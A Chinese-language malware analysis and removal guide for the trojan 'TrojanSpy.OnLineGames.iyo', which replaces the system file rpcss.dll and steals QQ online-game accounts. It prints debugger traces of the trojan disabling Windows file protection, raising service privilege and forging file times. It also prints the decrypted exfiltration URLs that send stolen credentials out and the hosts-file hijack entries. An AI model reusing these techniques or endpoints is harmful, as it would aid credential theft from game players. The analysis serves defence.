分析替换系统“rpcss.dll”文件的病毒和解决办法 locky 病毒解决办法

分析替换系统“rpcss.dll”文件的病毒和解决办法



英文名称：TrojanSpy.OnLineGames.iyo
中文名称：“网游窃贼”变种iyo
病毒长度：12060字节
病毒类型：木马
危险级别：★★
影响平台：Win 9X/ME/NT/2000/XP/2003
MD5 校验：c403b5d5ea1448efeb2d2ae71d41f5c3

============================================================================================
简单描述：
该病毒会通过替换系统“rpcss.dll”文件来实现开机自启动。是一个专门窃取QQ网络游戏帐号的木马程序。

同时，它还会窃取QQ网络游戏用户的密码保护资料。

中毒现象：
1、杀毒后系统不能上网。
2、杀毒后系统粘贴功能失效。
3、杀毒后系统任务栏上的部分信息不能正常显示。
4、杀毒后系统桌面程序“explorer.exe”启动非常慢，等好长时间才能显示出来桌面。
============================================================================================

病毒主程序“TrojanSpy.OnLineGames.iyo”部分的分析：
============================================================================================
加壳名称：Upack V0.37 -> Dwing *
采用高级语言编写。
入口：00002080
文件大小：12,060 字节。

释放恶意DLL组件：
ASCII "C:DOCUME~1ADMINI~1LOCALS~1Temp~ddc967.tmp" 文件大小：34,816字节，文件名称随机。

病毒主程序通过“rundll32.exe”进程调用运行病毒释放出来的DLL组件文件：
00402209 FF1500204000 CALL DWORD PTRDS:[402000]; kernel32.CreateProcessA
0012FC18 00000000|ModuleFileName = NULL
0012FC1C 0012FCB4 |CommandLine= "rundll32 C:DOCUME~1ADMINI~1LOCALS~1Temp~ddc967.tmp

INS C:Documents andSettingsAdministrator桌面new13.10260422.exe"
0012FC20 00000000|pProcessSecurity = NULL
0012FC24 00000000|pThreadSecurity = NULL
0012FC28 00000000|InheritHandles = FALSE
0012FC2C 00000000|CreationFlags = 0
0012FC30 00000000 |pEnvironment= NULL
0012FC34 00000000 |CurrentDir =NULL
0012FC38 0012FC44 |pStartupInfo= 0012FC44
0012FC3C 0012FC88 pProcessInfo= 0012FC88

病毒主程序在被感染计算机系统中安装完毕后会自我删除。
============================================================================================

病毒释放组件“~ddc967.tmp”部分的分析：
============================================================================================
采用高级语言编写，可能加壳。
文件大小：34,816 字节。

该DLL组件一般会被插入到“explorer.exe”、“csrss.exe”、“svchost.exe”等系统进程，以及几乎所有

用户级权限的进程中加载运行，并在被感染计算机系统的后台执行恶意操作，隐藏自我，防止被用户发现、被安全

软件查杀。
-----------------------------------------------------------------------------
1、插入系统进程“csrss.exe”：
监视DLL组件是否被调用，如果发现不存在(发现被关闭掉)则重新调用，达到自我保护的目的。

2、插入系统进程“explorer.exe”：
调用病毒组件“C:WINDOWSsystem32gdipro.dll”运行。躲避安全软件主动防御和监控等，达到自我保护的目的。

3、插入系统进程“svchost.exe”：
(1)、自我复制为“C:WINDOWSsystem32gdipro.dll”
(2)、通过“sfc_os.dll”来去除系统“C:WINDOWSsystem32rpcss.dll”文件的保护：
--------------------------------------------
10012D03 FF15C0200110 CALL DWORD PTRDS:[<&KERNEL32.LoadLibrar>;kernel32.LoadLibraryA
0006F340 10012B2C FileName ="sfc_os.dll"

10012D10FF15 C4200110 CALL DWORD PTRDS:[<&KERNEL32.GetProcAdd>;kernel32.GetProcAddress
0006F33C 76C30000 |hModule =76C30000 (sfc_os)
0006F340 00000005ProcNameOrOrdinal = #5

10012D38FFD6CALLESI; sfc_os.#5
0006F338 00000000
0006F33C 0006F348 UNICODE"C:WINDOWSsystem32rpcss.dll"
--------------------------------------------
(3)、用“DeleteFileA”删除系统文件“C:WINDOWSsystem32..ServicePackFilesi386rpcss.dll”

和“C:WINDOWSsystem32dllcacherpcss.dll”。
(4)、用“MoveFileExA”移动系统文件“C:WINDOWSsystem32rpcss.dll”到“C:WINDOWSsystem32

srpcss.dll”处。
10012E0D FF15BC200110 CALL DWORD PTRDS:[<&KERNEL32.MoveFileEx>;kernel32.MoveFileExA
0006F45C 0006F67C |ExistingName= "C:WINDOWSsystem32rpcss.dll"
0006F460 0006F578 |NewName ="C:WINDOWSsystem32srpcss.dll"
0006F464 00000001 Flags =REPLACE_EXISTING
(5)、用病毒释放出来的DLL组件文件“C:WINDOWSsystem32gdipro.dll”来替换系统文件“C:WINDOWS

system32rpcss.dll”。
(6)、用“GetFileTime”、“SetFileTime”获取系统文件时间并重新设置被病毒替换后的DLL组件文件“C:WINDOWSsystem32rpcss.dll”的时间(创建和修改日期)，达到更好的自我隐藏的目的。
(7)、释放DLL组件“C:WINDOWSsystem32sys17002.dll”(文件大小：23,040字节)。
(8)、用“GetFileTime”、“SetFileTime”获取系统文件时间并重新设置被病毒替换后的DLL组件文件“C:WINDOWSsystem32sys17002.dll”的时间(创建和修改日期)，达到更好的自我隐藏的目的。
(9)、提升服务的权限，把“NTAUTHORITYNetworkService”改为最高权限“LocalSystem”：

--------------------------------------------
10013313 FF1518200110 CALL DWORD PTRDS:[<&ADVAPI32.RegOpenKey>;ADVAPI32.RegOpenKeyExA
0006F754 80000002 |hKey =HKEY_LOCAL_MACHINE
0006F758 0006F770 |Subkey ="SYSTEMCurrentControlSetServicesrpcss"
0006F75C 00000000 |Reserved =0
0006F760 000F003F |Access =KEY_ALL_ACCESS
0006F764 0006F878 pHandle =0006F878

10013340FFD7CALLEDI; ADVAPI32.RegSetValueExA
0006F74C 10013342 /CALL 到RegSetValueExA 来自 gdipro.10013340
0006F750 00000080 |hKey =80
0006F754 10012C30 |ValueName ="ObjectName"
0006F758 00000000 |Reserved =0
0006F75C 00000002 |ValueType =REG_EXPAND_SZ
0006F760 10012C3C |Buffer =gdipro.10012C3C(LocalSystem)
0006F764 0000000C BufSize = C(12.)

10013352FF15 10200110 CALL DWORD PTRDS:[<&ADVAPI32.RegOpenKey>;ADVAPI32.RegOpenKeyA
0006F75C 00000080 |hKey =80
0006F760 10012C24 |Subkey ="Pa rameters"
0006F764 0006F874 pHandle =0006F874

10013372FFD7CALLEDI; ADVAPI32.RegSetValueExA
0006F74C 10013374 /CALL 到RegSetValueExA 来自 gdipro.10013372
0006F750 00000084 |hKey =84
0006F754 10012C18 |ValueName ="ServiceDll"
0006F758 00000000 |Reserved =0
0006F75C 00000002 |ValueType =REG_EXPAND_SZ
0006F760 10011404 |Buffer =gdipro.10011404(C:WINDOWSsystem32rpcss.dll)
0006F764 00000038 BufSize = 38(56.)
--------------------------------------------
(10)、“CreateRemoteThread”利用创建远线程的方式来调用运行“C:WINDOWSsystem32gdipro.dll”。
-----------------------------------------------------------------------------

该病毒利用进程守护功能来实现自我保护。
============================================================================================

病毒释放组件“sys17002.dll”部分的分析：
============================================================================================
加壳名称：dUP v2.x Patcher --> www.diablo2oo2.cjb.net *
采用高级语言编写。
文件大小：34,816 字节。

释放驱动文件“C:WINDOWSsystem32drivershm17002.sys”->文件大小：5,120 字节。

创建病毒配置文件“C:WINDOWSsystem32sys17002.add”。

发现地址加密前：ASCII "7a^G?BBBaaa^3>"
发现地址解密后：ASCII "g1.worrr111.cn"

发信地址：
http://g1.worrr111.cn/1a/zz4/zz.asp?Game=17&d00=&d01=&d10=&d11=&d21=&d30=&d31=&d32=&d40=0&d45=0&d42=0&d70=0&d71=0&d50=&d90=100
Game=17&d00=%s&d01=%s&d10=%s&d11=%s&d21=%s&d30=%s&d31=%s&d32=%s&d40=%u&d45=%u&d42=%u&d70=%d&d71=%d&d50=%s&d90=%d
http://g1.worrr111.cn/1a/zz4/mibao.asp?
Game=17&d10=%s&d11=%s&d00=%s&d01=%s&d20=%s:%s%%20%s:%s%%20%s:%s&d70=%d&d90=%d
act=&d10=%s&d80=%d

盗网络游戏帐号“QQ华夏”、“地下城与勇士”：
QQLogin.exe
DNF.exe

盗取QQ网络游戏的密码保护等信息资料。

域名劫持(当用户访问如下网站时，会被定向到骇客服务器地址“212.103.11.59”上)：
driversetchosts
212.103.11.59tpassport.wanmei.com
212.103.11.59treg.163.com
212.103.11.59tsde.game.sohu.com
212.103.11.59taccount.ztgame.com
212.103.11.59tpwd.sdo.com
212.103.11.59treg.91.com
============================================================================================

病毒释放驱动“hm17002.sys”部分的分析：
============================================================================================
恶意驱动程序。
文件大小：5,120 字节。

可能是利用驱动安装钩子截取QQ网络游戏密码，达到盗取游戏帐号的目的：
!This program cannot be run in DOS mode.
e:qqsgsetloa~1setloa~1objfre_wnet_x86i386SetLoadHook.pdb
============================================================================================

============================================================================================
手动删除该病毒的方法步骤(经过实际测试绝对有效)：

1、删除病毒文件“C:DOCUME~1ADMINI~1LOCALS~1Temp~*.tmp”、“C:WINDOWSsystem32gdipro.dll”、“C:WINDOWSsystem32drivershm17002.sys”、“C:WINDOWSsystem32sys17002.dll”、“C:WINDOWSsystem32

sys17002.add”、“C:WINDOWS system32rpcss.dll”
2、把系统文件“C:WINDOWSsystem32srpcss.dll”改名为“C:WINDOWSsystem32rpcss.dll”。

3、把注册表“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesrpcssObjectName”键值改为“NTAUTHORITYNetworkService”。

4、把注册表“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesrpcssParametersServiceDll”键值改为“%SystemRoot%system32rpcss.dll”。

5、重新启动计算机系统，系统杀毒修复完毕(系统重新启动后就可以上网了，粘贴功能有效了，同时任务栏的显示也正常了)。

6、使用杀毒软件进行全盘查杀病毒(该病毒为木马下载器下载到您计算机中的病毒，那个木马下载器还下载了N多其它病毒也同时安装到了您的计算机系统中)。

爱华网本文地址 » http://www.aihuau.com/a/25101016/301173.html